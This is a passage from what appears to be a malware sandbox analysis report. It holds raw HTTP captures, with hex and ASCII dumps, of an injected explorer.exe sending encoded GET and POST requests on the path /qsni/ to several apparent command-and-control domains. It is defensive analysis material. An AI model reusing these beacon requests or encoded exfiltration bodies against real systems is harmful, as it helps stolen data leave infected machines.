19 88 ff 42 2a 6f 88 a8 77 5e 60 f6 f2 1b 07 6d 95 79 3f 8d 75 c5 6f a6 8f 8b f3 3a 5b e4 24 7a 65 75 c5 8a 77 95 d5 f9 72 7a 4d dd b6 f5 9a f4
                                                                                          Data Ascii: `I%&/m{JJt`$@iG#)*eVe]f@{{;N'?\fdlJ!?~|?"O<y<ML_~Iwr7Ooxw7ulYymzt/yu`euGGc|[6fc!_..?Z~s?Jg.=Ln{{wN[e~LI5N?(MU6G;"/%~;^O(uTmdsn7y]UY~44}inb=<YCKB$r(]mgdOwEv7w{Iv=$|/{;A?((It]74UUC?9</JQyUi^s0QrZ}TV2gf`c0H+iu.CxV{f|)~??]?x>i5GGT>=>:y|7;=nVg~JPM GG[?;/?s/.}\"7dxlOCz~Z|YQ}Ol#3{D61Y>jGjI/'?{%G=fYQMi|C{_{(F.%L9MN?:JB*ow^`my?uo:[$zeuwrzM
                                                                                          Mar 30, 2023 10:26:33.740602970 CEST337INData Raw: 64 53 4f 2d 1f 10 77 fa 7c 00 65 41 bf fe fe 98 f4 df 7f 99 5f 31 1f 40 15 32 cc 49 55 cf f2 fa b3 8f 96 d5 47 a9 f9 7d 87 e0 91 0a 2c 4b 22 ac 7c 13 43 db e0 fd 40 88 9e 12 a5 05 4d 42 59 69 4a 98 cb 2f f6 07 b4 31 7e 02 07 a2 f9 63 ea a7 58 b5
                                                                                          Data Ascii: dSO-w|eA_1@2IUG},K"|C@MBYiJ/1~cXz9]=?^fu:oRV?{bBjoQ^%4bO4#YhgG?_7 ]{G@?G?/]( w


                                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                          45192.168.2.64975269.172.75.14280C:\Windows\explorer.exe
                                                                                          TimestampkBytes transferredDirectionData
                                                                                          Mar 30, 2023 10:26:36.892739058 CEST338OUTGET /qsni/?C6=p8pgVrFU0KaM67LkG2/HXLDeB7IL2n51le4JMrfTj7FohhyzYrH8fXmJIvaeotiFFl2VJ/RpY5m/lS8/GyXuRg8EnyJC/Fp8bjDJ/ib+v4lR&ZOm=dXna0d HTTP/1.1
                                                                                          Host: www.hexiemoju.com
                                                                                          Connection: close
                                                                                          Data Raw: 00 00 00 00 00 00 00
                                                                                          Data Ascii:
                                                                                          Mar 30, 2023 10:26:37.124103069 CEST339INHTTP/1.1 200 OK
                                                                                          Cache-Control: no-store
                                                                                          Pragma: no-cache
                                                                                          Content-Type: text/html; Charset=gb2312
                                                                                          Server: Microsoft-IIS/8.5
                                                                                          X-Powered-By: WAF/2.0
                                                                                          Date: Thu, 30 Mar 2023 08:26:37 GMT
                                                                                          Connection: close
                                                                                          Content-Length: 3368
                                                                                          Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 54 72 61 6e 73 69 74 69 6f 6e 61 6c 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 74 72 61 6e 73 69 74 69 6f 6e 61 6c 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 67 62 6b 32 33 31 32 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 20 20 20 70 61 64 64 69 6e 67 3a 30 3b 20 6d 61 72 67 69 6e 3a 30 3b 20 66 6f 6e 74 3a 31 34 70 78 2f 31 2e 35 20 4d 69 63 72 6f 73 6f 66 74 20 59 61 68 65 69 2c 20 cb ce 0a cc e5 2c 73 61 6e 73 2d 73 65 72 69 66 3b 20 63 6f 6c 6f 72 3a 23 35 35 35 3b 22 3e 0a 0a 3c 64 69 76 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 3a 30 20 61 75 74 6f 3b 77 69 64 74 68 3a 39 38 30 70 78 3b 22 3e 0a 20 20 20 20 20 20 3c 64 69 76 20 73 74 79 6c 65 3d 22 62 61 63 6b 67 72 6f 75 6e 64 3a 20 75 72 6c 28 27 68 74 74 70 3a 2f 2f 34 30 34 2e 73 61 66 65 64 6f 67 2e 63 6e 2f 69 6d 61 67 65 73 2f 73 61 66 65 64 6f 67 73 69 74 65 2f 68 65 61 64 2e 70 6e 67 27 29 20 6e 6f 2d 72 65 70 65 61 74 3b 68 65 69 67 68 74 3a 33 30 30 70 78 3b 22 3e 0a 20 20 20 20 20 20 09 3c 64 69 76 20 73 74 79 6c 65 3d 22 77 69 64 74 68 3a 33 30 30 70 78 3b 68 65 69 67 68 74 3a 33 30 30 70 78 3b 63 75 72 73 6f 72 3a 70 6f 69 6e 74 65 72 3b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 30 30 3b 66 69 6c 74 65 72 3a 20 61 6c 70 68 61 28 6f 70 61 63 69 74 79 3d 30 29 3b 20 6f 70 61 63 69 74 79 3a 20 30 3b 66 6c 6f 61 74 3a 6c 65 66 74 3b 22 20 6f 6e 63 6c 69 63 6b 3d 22 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 66 3d 27 68 74 74 70 3a 2f 2f 77 77 77 2e 73 61 66 65 64 6f 67 2e 63 6e 27 22 3e 0a 20 20 20 20 20 20 09 3c 2f 64 69 76 3e 0a 20 20 20 20 20 20 09 3c 64 69 76 20 73 74 79 6c 65 3d 22 66 6c 6f 61 74 3a 72 69 67 68 74 3b 77 69 64 74 68 3a 34 33 30 70 78 3b 68 65 69 67 68 74 3a 31 30 30 70 78 3b 70 61 64 64 69 6e 67 2d 74 6f 70 3a 39 30 70 78 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 39 30 70 78 3b 66 6f 6e 74 2d 73 69 7a 65 3a 32 32 70 78 3b 22 3e 0a 20 20 20 20 20 20 09 09 3c 70 20 69 64 3d 22 65 72 72 6f 72 5f 63 6f 64 65 5f 70 22 3e 3c 61 20 20 69 64 3d 22 65 43 6f 64 65 22 3e 34 30 34 3c 2f 61 3e b4 ed ce f3 3c 73 70 61 6e 20 73 74 79 6c 65 3d 22 66 6f 6e 74 2d 73 69 7a 65 3a 31 36 70 78 3b 70 61 64 64 69 6e 67 2d 6c 65 66 74 3a 31 35 70 78 3b 22 3e 28 bf c9 d4 da b7 fe ce f1 c6 f7 c9 cf b2 e9 bf b4 be df cc e5 b4 ed ce f3 d0 c5 cf a2 29 3c 2f 73 70 61 6e 3e 3c 2f 70 3e 0a 20 20 20 20 20 20 09 09 3c 70 20 69 64 3d 22 65 4d 73 67 22 3e 3c 2f 70 3e 0a 20 20 20 20 20 20 09 3c 61 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 62 62 73 2e 73 61 66 65 64 6f 67 2e 63 6e 2f 74 68 72 65 61 64 2d 36 30 36 39 33 2d 31 2d 31 2e 68 74 6d 6c 3f 66
                                                                                          Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head><meta http-equiv="Content-Type" content="text/html; charset=gbk2312" /><title></title></head><body style=" padding:0; margin:0; font:14px/1.5 Microsoft Yahei, ,sans-serif; color:#555;"><div style="margin:0 auto;width:980px;"> <div style="background: url('http://404.safedog.cn/images/safedogsite/head.png') no-repeat;height:300px;"> <div style="width:300px;height:300px;cursor:pointer;background:#f00;filter: alpha(opacity=0); opacity: 0;float:left;" onclick="location.href='http://www.safedog.cn'"> </div> <div style="float:right;width:430px;height:100px;padding-top:90px;padding-right:90px;font-size:22px;"> <p id="error_code_p"><a id="eCode">404</a><span style="font-size:16px;padding-left:15px;">()</span></p> <p id="eMsg"></p> <a href="http://bbs.safedog.cn/thread-60693-1-1.html?f
                                                                                          Mar 30, 2023 10:26:37.124147892 CEST340INData Raw: 72 6f 6d 3d 73 74 61 74 22 20 74 61 72 67 65 74 3d 22 5f 62 6c 61 6e 6b 22 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 23 31 33 39 66 66 38 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 36 70 78 3b 20 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f
                                                                                          Data Ascii: rom=stat" target="_blank" style="color:#139ff8; font-size:16px; text-decoration:none"></a> <a href="#" onclick="redirectToHost();" style="color:#139ff8; font-size:16px; text-decoration:none;padding-left: 20px;">>></a
                                                                                          Mar 30, 2023 10:26:37.124177933 CEST341INData Raw: a8 b4 a6 c0 ed b8 c3 c7 eb c7 f3 22 2c 0a 09 22 35 30 34 22 3a 22 d4 da b5 c8 b4 fd c9 cf d3 ce b7 fe ce f1 c6 f7 cf ec d3 a6 ca b1 a3 ac cd f8 b9 d8 bb f2 b4 fa c0 ed b7 fe ce f1 c6 f7 b3 ac ca b1 22 2c 0a 09 22 35 30 35 22 3a 22 b7 fe ce f1 c6
                                                                                          Data Ascii: ","504":"","505":" HTTP ","1":" DNS ","2":"","-7":"","-100":"","-101":"","-102


                                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                          46192.168.2.64975345.136.196.21580C:\Windows\explorer.exe
                                                                                          TimestampkBytes transferredDirectionData
                                                                                          Mar 30, 2023 10:26:44.206953049 CEST342OUTGET /qsni/?ZOm=dXna0d&C6=26sVYQdWyPHrLcN8MdbUKtu6rE5mK0DGN1OetThfHCln6c5Rbo6sl7lf7GeT2I5yOzNBygfgGXS7QAdgzJGeV3dtWL+OEoULXVdsrh2vXHGa HTTP/1.1
                                                                                          Host: www.studioweiden.click
                                                                                          Connection: close
                                                                                          Data Raw: 00 00 00 00 00 00 00
                                                                                          Data Ascii:
                                                                                          Mar 30, 2023 10:26:44.247869968 CEST342INHTTP/1.1 404 Not Found
                                                                                          Server: nginx/1.22.0
                                                                                          Date: Thu, 30 Mar 2023 08:27:01 GMT
                                                                                          Content-Type: text/html; charset=iso-8859-1
                                                                                          Content-Length: 203
                                                                                          Connection: close
                                                                                          Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 71 73 6e 69 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                                          Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /qsni/ was not found on this server.</p></body></html>


                                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                          47192.168.2.649754145.239.252.4980C:\Windows\explorer.exe
                                                                                          TimestampkBytes transferredDirectionData
                                                                                          Mar 30, 2023 10:26:49.294538975 CEST343OUTPOST /qsni/ HTTP/1.1
                                                                                          Host: www.deconsurveys.com
                                                                                          Connection: close
                                                                                          Content-Length: 188
                                                                                          Cache-Control: no-cache
                                                                                          Origin: http://www.deconsurveys.com
                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                          Accept: */*
                                                                                          Referer: http://www.deconsurveys.com/qsni/
                                                                                          Accept-Language: en-US
                                                                                          Accept-Encoding: gzip, deflate
                                                                                          Data Raw: 43 36 3d 68 68 72 72 4b 7a 75 54 46 69 6c 32 56 37 71 30 52 63 6a 61 36 39 4e 5f 6a 47 79 67 46 4b 54 67 54 36 44 61 64 56 68 4b 68 75 76 37 46 55 6c 4a 41 59 70 6a 59 73 41 72 46 43 4c 35 30 69 75 32 63 4f 31 77 4b 45 6e 69 4e 79 52 57 6a 44 4c 66 75 6a 4e 67 72 6e 43 49 46 67 47 7a 52 58 56 59 42 47 63 61 28 43 36 4f 52 54 41 39 51 64 6a 7a 7e 36 38 45 5a 78 36 73 75 5f 6a 4b 45 2d 76 36 44 2d 76 6c 57 4d 74 65 49 67 56 6f 7a 58 73 75 28 4f 51 49 48 76 30 34 55 45 41 64 39 41 68 43 6f 48 57 39 74 78 47 58 38 71 54 55 61 4b 46 56 65 42 4d 55 39 48 51 2e 00 00 00 00 00 00 00 00
                                                                                          Data Ascii: C6=hhrrKzuTFil2V7q0Rcja69N_jGygFKTgT6DadVhKhuv7FUlJAYpjYsArFCL50iu2cO1wKEniNyRWjDLfujNgrnCIFgGzRXVYBGca(C6ORTA9Qdjz~68EZx6su_jKE-v6D-vlWMteIgVozXsu(OQIHv04UEAd9AhCoHW9txGX8qTUaKFVeBMU9HQ.
                                                                                          Mar 30, 2023 10:26:49.325633049 CEST344INHTTP/1.1 404 Not Found
                                                                                          Date: Thu, 30 Mar 2023 08:26:49 GMT
                                                                                          Server: Apache
                                                                                          Content-Length: 315
                                                                                          Connection: close
                                                                                          Content-Type: text/html; charset=iso-8859-1
                                                                                          Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                                          Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                          48192.168.2.649755145.239.252.4980C:\Windows\explorer.exe
                                                                                          TimestampkBytes transferredDirectionData
                                                                                          Mar 30, 2023 10:26:51.852358103 CEST346OUTPOST /qsni/ HTTP/1.1
                                                                                          Host: www.deconsurveys.com
                                                                                          Connection: close
                                                                                          Content-Length: 1452
                                                                                          Cache-Control: no-cache
                                                                                          Origin: http://www.deconsurveys.com
                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                          Accept: */*
                                                                                          Referer: http://www.deconsurveys.com/qsni/
                                                                                          Accept-Language: en-US
                                                                                          Accept-Encoding: gzip, deflate
                                                                                          Data Raw: 43 36 3d 68 68 72 72 4b 7a 75 54 46 69 6c 32 56 62 32 30 54 37 50 61 38 64 4e 34 6d 47 79 67 4c 61 54 6b 54 37 28 61 64 51 5a 61 68 63 44 37 46 6a 42 4a 41 37 4e 6a 61 73 41 72 56 79 4c 39 35 43 75 61 63 4f 52 53 4b 46 32 56 4e 78 39 57 73 41 7a 66 6d 42 6c 76 28 48 43 4f 42 67 47 77 52 58 56 4a 42 43 77 65 28 43 76 70 52 54 34 39 51 70 62 7a 76 36 38 46 56 52 36 73 75 5f 6a 47 45 2d 76 57 44 36 4c 39 57 4e 30 44 49 53 4e 6f 7a 79 51 75 7a 4e 49 50 42 76 30 6b 64 6b 42 54 38 69 73 78 71 68 50 62 76 55 4f 4b 73 75 58 63 42 4c 39 51 50 51 55 54 72 67 73 78 33 73 61 75 32 48 4c 35 52 68 66 6d 4a 53 64 54 6c 5f 51 65 64 37 50 47 6a 43 65 41 6a 31 76 55 4b 2d 77 54 53 45 56 6a 38 6c 55 42 75 5a 79 54 50 36 53 45 44 58 61 2d 37 41 6d 50 51 4c 28 7a 52 71 34 48 46 55 6a 6b 78 74 52 4f 33 33 69 58 66 79 47 36 46 51 54 4f 6a 71 4a 57 61 37 38 43 57 2d 62 56 72 47 6e 69 28 43 33 49 4b 79 59 4c 6b 58 52 54 4d 4f 62 76 37 47 57 67 30 34 67 52 66 74 74 63 28 56 35 54 72 51 79 6a 47 42 43 31 6d 54 4d 5a 45 70 77 2d 52 6b 70 50 65 53 67 33 31 6d 42 4b 64 62 42 45 77 67 7e 33 4d 6d 4f 51 76 42 35 4d 78 41 51 53 65 47 53 55 57 72 52 51 48 66 6b 6a 71 64 55 32 6e 38 6f 50 39 75 65 54 4f 42 6c 33 34 71 50 6d 41 36 4c 36 28 76 56 30 41 72 49 63 41 73 66 68 36 42 70 4f 44 55 72 73 64 32 59 44 57 42 42 49 4b 52 50 55 51 42 69 43 58 52 34 45 68 35 4a 30 31 6e 6c 5f 4c 50 58 39 28 72 46 69 4b 72 6f 6e 5a 35 31 46 4d 36 48 36 52 6f 45 33 37 63 5a 49 5a 54 63 67 75 45 35 73 6a 51 72 76 7a 43 4e 56 51 35 61 55 51 35 39 6a 74 71 75 61 44 56 46 6f 32 46 4e 47 36 76 64 44 66 78 64 70 4d 52 33 49 38 7a 55 76 70 6d 54 61 55 70 39 48 63 4c 31 55 66 79 76 68 5a 4c 44 79 47 2d 30 75 61 73 61 37 57 35 6b 33 6f 74 58 2d 74 79 70 42 69 34 52 37 57 64 48 33 53 69 68 61 59 37 31 35 28 62 74 6c 35 4f 4d 6e 6b 77 58 39 73 72 57 67 33 42 4d 75 43 38 43 35 45 69 35 62 79 4b 36 72 4f 70 50 6d 4d 44 78 43 73 47 46 75 4e 7a 6b 48 74 75 77 5a 4f 36 66 2d 7e 63 4e 69 56 79 63 6d 43 54 63 30 53 69 4c 2d 28 72 6b 4a 6f 66 7e 69 64 57 63 4f 69 4e 6e 76 41 5f 32 50 54 54 49 69 28 41 6a 78 31 59 4f 51 64 74 7e 72 4a 45 42 4d 39 4b 33 74 42 31 79 37 6a 52 63 58 71 41 31 4f 6f 6f 28 6e 71 6a 6f 6f 66 68 71 2d 62 74 59 54 5a 69 75 75 59 52 64 61 43 52 7e 37 5a 4d 43 74 45 38 75 4b 4e 42 70 55 46 61 76 65 4a 57 73 69 4a 4c 6b 58 6f 76 50 58 4e 6d 46 55 61 35 7a 71 79 56 46 63 68 53 35 52 72 64 5a 4a 64 55 4b 49 33 76 73 46 67 52 50 59 73 45 70 4f 43 55 4d 32 56 43 69 6b 53 45 45 6f 4c 62 46 32 65 52 58 6f 6c 32 30 75 4e 47 4d 73 58 70 53 38 4e 6b 48 43 6b 50 61 6d 6f 67 4f 58 4a 4e 48 64 51 46 35 5a 44 42 7a 34 50 44 76 6f 30 77 59 30 63 4a 74 47 34 5f 32 49 69 65 69 4d 65 76 6f 7a 49 76 6e 56 6d 74 55 58 45 68 34 6e 4d 56 52 41 49 4d 51 4c 55 36 51 61 56 70 6e 45 35 49 43 41 56 4a 4a 6e 45 6c 73 57 56 49 6d 72 4d 41 79 32 64 61 63 62 4f 57 35 62 53 53 61 38 37 5a 6f 5a 56 50 6d 49 4f 36 64 6e 72 68 57 32 6d 55 6d 34 45 6e 33 55 4d 50 65 6a 58 4d 77 5f 67 69 4e 39 52 59 39 64 52 55 52 52 41 34 6e 6c 4f 36 4a 58 70 7a 73 44 37 74 7a 38 4f 37 50 68 73 56 38 36 4f 57 71 4b 32 6d 71 58 28 53 34 4c 42 71 69 71 70 68 43 46 41 65 7a 31 4f 55 4a 6b 55 4a 52 46 57 71 71 73 63 48 7a 76 43 4a 77 54 39 68 6a 73 52 5f 37 59 62 55 39 5a 54 6f 64 7a 4d 6d 6e 71 7a 6e 63 4d 78 5f 54 75 55 36 56 6f 77 55 74 2d 53 51 6e 59 68 37 58 50 44 35 34 79 77 52 44 50 77 30 66 45 28 6f 6c 65 69 78 72 72 47 31 44 44 31 61 49 56 78 6d 4e 5a 5a 5f 73 6a 30 58 45 38 38 77 33 55 72 69 50 5f 4c 5f 6a 66 44 54 59 70 69 56 34 50 7e 57 54 47 39 30 49 31 44 6e 78 53 69 72 57 6b 5a 5f 69 76 41 75 38 32 31 74 4b 7a 72 7a 77 45 50 78 72 30 32 38 31 2d 64 73 48 73 4f 78 45 5a 73 6f 75 58 63 4e 73 6f 35 41 56 58 69 73 46 4c 39 4e 67 52 34 74 4c 48 76 66 4e 64 71 5a 77 65 6b 66 62 71 59 57 7e 69 50 31 4a 55 78 30 55 33 63 44 38 72 5a 58 4e 57 56 34 62 42 35 4e 30 4e 36 72 56 6f 5a 62 66 57 32 6f 30 6e 51 41 70 68 7a 51 56 48 5a 36 7a 65 4f 54 30 76 51 49 53 37 51 70 6b 4e 65 64 63 4f 62 76 34 68 46 30 31 76 73 6e 69 33 66 46 64 76 65 49 65 37 32 46 35 67 79 5a 76 50 38 48 67 72 4b 35 4d 68 38 6b 41 78 55 6e 50 47
                                                                                          Data Ascii: C6=hhrrKzuTFil2Vb20T7Pa8dN4mGygLaTkT7(adQZahcD7FjBJA7NjasArVyL95CuacORSKF2VNx9WsAzfmBlv(HCOBgGwRXVJBCwe(CvpRT49Qpbzv68FVR6su_jGE-vWD6L9WN0DISNozyQuzNIPBv0kdkBT8isxqhPbvUOKsuXcBL9QPQUTrgsx3sau2HL5RhfmJSdTl_Qed7PGjCeAj1vUK-wTSEVj8lUBuZyTP6SEDXa-7AmPQL(zRq4HFUjkxtRO33iXfyG6FQTOjqJWa78CW-bVrGni(C3IKyYLkXRTMObv7GWg04gRfttc(V5TrQyjGBC1mTMZEpw-RkpPeSg31mBKdbBEwg~3MmOQvB5MxAQSeGSUWrRQHfkjqdU2n8oP9ueTOBl34qPmA6L6(vV0ArIcAsfh6BpODUrsd2YDWBBIKRPUQBiCXR4Eh5J01nl_LPX9(rFiKronZ51FM6H6RoE37cZIZTcguE5sjQrvzCNVQ5aUQ59jtquaDVFo2FNG6vdDfxdpMR3I8zUvpmTaUp9HcL1UfyvhZLDyG-0uasa7W5k3otX-typBi4R7WdH3SihaY715(btl5OMnkwX9srWg3BMuC8C5Ei5byK6rOpPmMDxCsGFuNzkHtuwZO6f-~cNiVycmCTc0SiL-(rkJof~idWcOiNnvA_2PTTIi(Ajx1YOQdt~rJEBM9K3tB1y7jRcXqA1Ooo(nqjoofhq-btYTZiuuYRdaCR~7ZMCtE8uKNBpUFaveJWsiJLkXovPXNmFUa5zqyVFchS5RrdZJdUKI3vsFgRPYsEpOCUM2VCikSEEoLbF2eRXol20uNGMsXpS8NkHCkPamogOXJNHdQF5ZDBz4PDvo0wY0cJtG4_2IieiMevozIvnVmtUXEh4nMVRAIMQLU6QaVpnE5ICAVJJnElsWVImrMAy2dacbOW5bSSa87ZoZVPmIO6dnrhW2mUm4En3UMPejXMw_giN9RY9dRURRA4nlO6JXpzsD7tz8O7PhsV86OWqK2mqX(S4LBqiqphCFAez1OUJkUJRFWqqscHzvCJwT9hjsR_7YbU9ZTodzMmnqzncMx_TuU6VowUt-SQnYh7XPD54ywRDPw0fE(oleixrrG1DD1aIVxmNZZ_sj0XE88w3UriP_L_jfDTYpiV4P~WTG90I1DnxSirWkZ_ivAu821tKzrzwEPxr0281-dsHsOxEZsouXcNso5AVXisFL9NgR4tLHvfNdqZwekfbqYW~iP1JUx0U3cD8rZXNWV4bB5N0N6rVoZbfW2o0nQAphzQVHZ6zeOT0vQIS7QpkNedcObv4hF01vsni3fFdveIe72F5gyZvP8HgrK5Mh8kAxUnPG4VAwhDYH8At7eeiqL1kh2rI7HXrszKScw318Xe5sGbWbgnsgqvFo2ryqY3MXkNit3KrFNu2T2lq4jtfLwnxLmj8.
                                                                                          Mar 30, 2023 10:26:51.882659912 CEST347INHTTP/1.1 404 Not Found
                                                                                          Date: Thu, 30 Mar 2023 08:26:51 GMT
                                                                                          Server: Apache
                                                                                          Content-Length: 315
                                                                                          Connection: close
                                                                                          Content-Type: text/html; charset=iso-8859-1
                                                                                          Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                                          Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                          49192.168.2.649756145.239.252.4980C:\Windows\explorer.exe
                                                                                          TimestampkBytes transferredDirectionData
                                                                                          Mar 30, 2023 10:26:54.408302069 CEST347OUTGET /qsni/?C6=sjDLJDaVFikbBLWeMZWSwu5CnHyJDqPqbcjbdnlFjtv6c2l5GqNUNqEWLibW6hm2WPlpLlzvFm1TmHWnlQdAoValOlOqTFFHZz0t1yDYUjQx&ZOm=dXna0d HTTP/1.1
                                                                                          Host: www.deconsurveys.com
                                                                                          Connection: close
                                                                                          Data Raw: 00 00 00 00 00 00 00
                                                                                          Data Ascii:
                                                                                          Mar 30, 2023 10:26:54.439362049 CEST348INHTTP/1.1 404 Not Found
                                                                                          Date: Thu, 30 Mar 2023 08:26:54 GMT
                                                                                          Server: Apache
                                                                                          Content-Length: 315
                                                                                          Connection: close
                                                                                          Content-Type: text/html; charset=iso-8859-1
